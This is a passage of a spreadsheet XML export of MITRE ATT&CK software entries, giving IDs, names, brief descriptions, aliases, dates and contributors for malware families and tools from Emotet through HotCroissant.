    <t>[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0367</t>
  </si>
  <si>
    <t>25 March 2019</t>
  </si>
  <si>
    <t>Geodo</t>
  </si>
  <si>
    <t>Omkar Gudhate</t>
  </si>
  <si>
    <t>S0363</t>
  </si>
  <si>
    <t>Empire</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1059/001) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0363</t>
  </si>
  <si>
    <t>11 March 2019</t>
  </si>
  <si>
    <t>09 April 2021</t>
  </si>
  <si>
    <t>EmPyre, PowerShell Empire</t>
  </si>
  <si>
    <t>S0091</t>
  </si>
  <si>
    <t>Epic</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0091</t>
  </si>
  <si>
    <t>26 October 2020</t>
  </si>
  <si>
    <t>TadjMakhal, Tavdig, Wipbot, WorldCupSec</t>
  </si>
  <si>
    <t>Martin Smolár, ESET</t>
  </si>
  <si>
    <t>S0396</t>
  </si>
  <si>
    <t>EvilBunny</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0396</t>
  </si>
  <si>
    <t>28 June 2019</t>
  </si>
  <si>
    <t>02 April 2021</t>
  </si>
  <si>
    <t>S0152</t>
  </si>
  <si>
    <t>EvilGrab</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://attack.mitre.org/groups/G0045) via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0152</t>
  </si>
  <si>
    <t>S0401</t>
  </si>
  <si>
    <t>Exaramel for Linux</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0401</t>
  </si>
  <si>
    <t>26 August 2019</t>
  </si>
  <si>
    <t>S0343</t>
  </si>
  <si>
    <t>Exaramel for Windows</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0343</t>
  </si>
  <si>
    <t>S0361</t>
  </si>
  <si>
    <t>Expand</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0361</t>
  </si>
  <si>
    <t>19 February 2019</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>S0569</t>
  </si>
  <si>
    <t>Explosive</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0569</t>
  </si>
  <si>
    <t>S0181</t>
  </si>
  <si>
    <t>FALLCHILL</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0181</t>
  </si>
  <si>
    <t>S0267</t>
  </si>
  <si>
    <t>FELIXROOT</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0267</t>
  </si>
  <si>
    <t>GreyEnergy mini</t>
  </si>
  <si>
    <t>S0036</t>
  </si>
  <si>
    <t>FLASHFLOOD</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0036</t>
  </si>
  <si>
    <t>S0173</t>
  </si>
  <si>
    <t>FLIPSIDE</t>
  </si>
  <si>
    <t>[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0173</t>
  </si>
  <si>
    <t>S0095</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>[FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0095</t>
  </si>
  <si>
    <t>ftp.exe</t>
  </si>
  <si>
    <t>S0076</t>
  </si>
  <si>
    <t>FakeM</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0076</t>
  </si>
  <si>
    <t>27 March 2020</t>
  </si>
  <si>
    <t>S0512</t>
  </si>
  <si>
    <t>FatDuke</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) is a backdoor used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2016.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0512</t>
  </si>
  <si>
    <t>24 September 2020</t>
  </si>
  <si>
    <t>09 October 2020</t>
  </si>
  <si>
    <t>S0171</t>
  </si>
  <si>
    <t>Felismus</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0171</t>
  </si>
  <si>
    <t>S0120</t>
  </si>
  <si>
    <t>Fgdump</t>
  </si>
  <si>
    <t>[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0120</t>
  </si>
  <si>
    <t>S0182</t>
  </si>
  <si>
    <t>FinFisher</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0182</t>
  </si>
  <si>
    <t>Android, Windows</t>
  </si>
  <si>
    <t>FinSpy</t>
  </si>
  <si>
    <t>S0355</t>
  </si>
  <si>
    <t>Final1stspy</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0355</t>
  </si>
  <si>
    <t>31 January 2019</t>
  </si>
  <si>
    <t>S0143</t>
  </si>
  <si>
    <t>Flame</t>
  </si>
  <si>
    <t>Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0143</t>
  </si>
  <si>
    <t>Flamer, sKyWIper</t>
  </si>
  <si>
    <t>S0381</t>
  </si>
  <si>
    <t>FlawedAmmyy</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0381</t>
  </si>
  <si>
    <t>28 May 2019</t>
  </si>
  <si>
    <t>S0383</t>
  </si>
  <si>
    <t>FlawedGrace</t>
  </si>
  <si>
    <t>[FlawedGrace](https://attack.mitre.org/software/S0383) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0383</t>
  </si>
  <si>
    <t>29 May 2019</t>
  </si>
  <si>
    <t>07 June 2019</t>
  </si>
  <si>
    <t>S0193</t>
  </si>
  <si>
    <t>Forfiles</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0193</t>
  </si>
  <si>
    <t>S0503</t>
  </si>
  <si>
    <t>FrameworkPOS</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0503</t>
  </si>
  <si>
    <t>08 September 2020</t>
  </si>
  <si>
    <t>19 October 2020</t>
  </si>
  <si>
    <t>Trinity</t>
  </si>
  <si>
    <t>S0277</t>
  </si>
  <si>
    <t>FruitFly</t>
  </si>
  <si>
    <t>FruitFly is designed to spy on mac users  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0277</t>
  </si>
  <si>
    <t>S0410</t>
  </si>
  <si>
    <t>Fysbis</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) is a Linux-based backdoor used by [APT28](https://attack.mitre.org/groups/G0007) that dates back to at least 2014.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0410</t>
  </si>
  <si>
    <t>12 September 2019</t>
  </si>
  <si>
    <t>06 November 2020</t>
  </si>
  <si>
    <t>S0026</t>
  </si>
  <si>
    <t>GLOOXMAIL</t>
  </si>
  <si>
    <t>[GLOOXMAIL](https://attack.mitre.org/software/S0026) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Jabber/XMPP traffic. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0026</t>
  </si>
  <si>
    <t>Trojan.GTALK</t>
  </si>
  <si>
    <t>S0417</t>
  </si>
  <si>
    <t>GRIFFON</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0417</t>
  </si>
  <si>
    <t>23 June 2020</t>
  </si>
  <si>
    <t>S0168</t>
  </si>
  <si>
    <t>Gazer</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) is a backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2016. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0168</t>
  </si>
  <si>
    <t>WhiteBear</t>
  </si>
  <si>
    <t>Bartosz Jerzman</t>
  </si>
  <si>
    <t>S0049</t>
  </si>
  <si>
    <t>GeminiDuke</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0049</t>
  </si>
  <si>
    <t>S0460</t>
  </si>
  <si>
    <t>Get2</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0460</t>
  </si>
  <si>
    <t>16 June 2020</t>
  </si>
  <si>
    <t>S0249</t>
  </si>
  <si>
    <t>Gold Dragon</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0249</t>
  </si>
  <si>
    <t>S0597</t>
  </si>
  <si>
    <t>GoldFinder</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform  threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0597</t>
  </si>
  <si>
    <t>26 March 2021</t>
  </si>
  <si>
    <t>S0588</t>
  </si>
  <si>
    <t>GoldMax</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go that was used by [APT29](https://attack.mitre.org/groups/G0016) and discovered in early 2021 during the investigation into breaches related to the SolarWinds intrusion. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0588</t>
  </si>
  <si>
    <t>SUNSHUTTLE</t>
  </si>
  <si>
    <t>S0493</t>
  </si>
  <si>
    <t>GoldenSpy</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://attack.mitre.org/software/S0493) was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.(Citation: Trustwave GoldenSpy June 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0493</t>
  </si>
  <si>
    <t>23 July 2020</t>
  </si>
  <si>
    <t>19 August 2020</t>
  </si>
  <si>
    <t>S0477</t>
  </si>
  <si>
    <t>Goopy</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0477</t>
  </si>
  <si>
    <t>19 June 2020</t>
  </si>
  <si>
    <t>S0531</t>
  </si>
  <si>
    <t>Grandoreiro</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://attack.mitre.org/software/S0531) has confirmed victims in Brazil, Mexico, Portugal, and Spain.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0531</t>
  </si>
  <si>
    <t>10 November 2020</t>
  </si>
  <si>
    <t>S0237</t>
  </si>
  <si>
    <t>GravityRAT</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. (Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0237</t>
  </si>
  <si>
    <t>S0342</t>
  </si>
  <si>
    <t>GreyEnergy</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be the successor of it.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0342</t>
  </si>
  <si>
    <t>S0561</t>
  </si>
  <si>
    <t>GuLoader</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198).(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0561</t>
  </si>
  <si>
    <t>11 January 2021</t>
  </si>
  <si>
    <t>20 April 2021</t>
  </si>
  <si>
    <t>S0132</t>
  </si>
  <si>
    <t>H1N1</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0132</t>
  </si>
  <si>
    <t>S0151</t>
  </si>
  <si>
    <t>HALFBAKED</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0151</t>
  </si>
  <si>
    <t>S0037</t>
  </si>
  <si>
    <t>HAMMERTOSS</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: FireEye APT29) (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0037</t>
  </si>
  <si>
    <t>HammerDuke, NetDuke</t>
  </si>
  <si>
    <t>S0214</t>
  </si>
  <si>
    <t>HAPPYWORK</t>
  </si>
  <si>
    <t>[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0214</t>
  </si>
  <si>
    <t>S0246</t>
  </si>
  <si>
    <t>HARDRAIN</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0246</t>
  </si>
  <si>
    <t>S0391</t>
  </si>
  <si>
    <t>HAWKBALL</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0391</t>
  </si>
  <si>
    <t>20 June 2019</t>
  </si>
  <si>
    <t>S0061</t>
  </si>
  <si>
    <t>HDoor</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0061</t>
  </si>
  <si>
    <t>25 April 2019</t>
  </si>
  <si>
    <t>Custom HDoor</t>
  </si>
  <si>
    <t>S0135</t>
  </si>
  <si>
    <t>HIDEDRV</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0135</t>
  </si>
  <si>
    <t>S0232</t>
  </si>
  <si>
    <t>HOMEFRY</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://attack.mitre.org/groups/G0065) backdoors. (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0232</t>
  </si>
  <si>
    <t>S0376</t>
  </si>
  <si>
    <t>HOPLIGHT</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0376</t>
  </si>
  <si>
    <t>S0040</t>
  </si>
  <si>
    <t>HTRAN</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0040</t>
  </si>
  <si>
    <t>HUC Packet Transmit Tool</t>
  </si>
  <si>
    <t>S0070</t>
  </si>
  <si>
    <t>HTTPBrowser</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0070</t>
  </si>
  <si>
    <t>HttpDump, Token Control</t>
  </si>
  <si>
    <t>S0047</t>
  </si>
  <si>
    <t>Hacking Team UEFI Rootkit</t>
  </si>
  <si>
    <t>[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0047</t>
  </si>
  <si>
    <t>S0499</t>
  </si>
  <si>
    <t>Hancitor</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by [Pony](https://attack.mitre.org/software/S0453) and other information stealing malware.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0499</t>
  </si>
  <si>
    <t>12 August 2020</t>
  </si>
  <si>
    <t>16 October 2020</t>
  </si>
  <si>
    <t>Chanitor</t>
  </si>
  <si>
    <t>S0224</t>
  </si>
  <si>
    <t>Havij</t>
  </si>
  <si>
    <t>[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0224</t>
  </si>
  <si>
    <t>S0170</t>
  </si>
  <si>
    <t>Helminth</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. (Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0170</t>
  </si>
  <si>
    <t>Robert Falcone</t>
  </si>
  <si>
    <t>S0087</t>
  </si>
  <si>
    <t>Hi-Zor</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://attack.mitre.org/software/S0074). It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0087</t>
  </si>
  <si>
    <t>S0394</t>
  </si>
  <si>
    <t>HiddenWasp</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0394</t>
  </si>
  <si>
    <t>24 June 2019</t>
  </si>
  <si>
    <t>S0009</t>
  </si>
  <si>
    <t>Hikit</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise.(Citation: Novetta-Axiom)(Citation: FireEye Hikit Rootkit)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0009</t>
  </si>
  <si>
    <t>S0601</t>
  </si>
  <si>
    <t>Hildegard</t>
  </si>
  <si>
    <t>[Hildegard](https://attack.mitre.org/software/S0601) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://attack.mitre.org/software/S0601). (Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0601</t>
  </si>
  <si>
    <t>07 April 2021</t>
  </si>
  <si>
    <t>12 April 2021</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux</t>
  </si>
  <si>
    <t>S0431</t>
  </si>
  <si>
    <t>HotCroissant</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.(Citation: US-CERT HOTCROISSANT February 2020) [HotCroissant](https://attack.mitre.org/software/S0431) shares numerous code similarities with [Rifdoor](https://attack.mitre.org/software/S0433).(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0431</t>
  </si>
  <si>
    <t>01 May 2020</t>
  </si>
  <si>
    <t>S0203</t>
  </si>
  <si>
    <t>Hydraq</t>
  </si>
  <si>
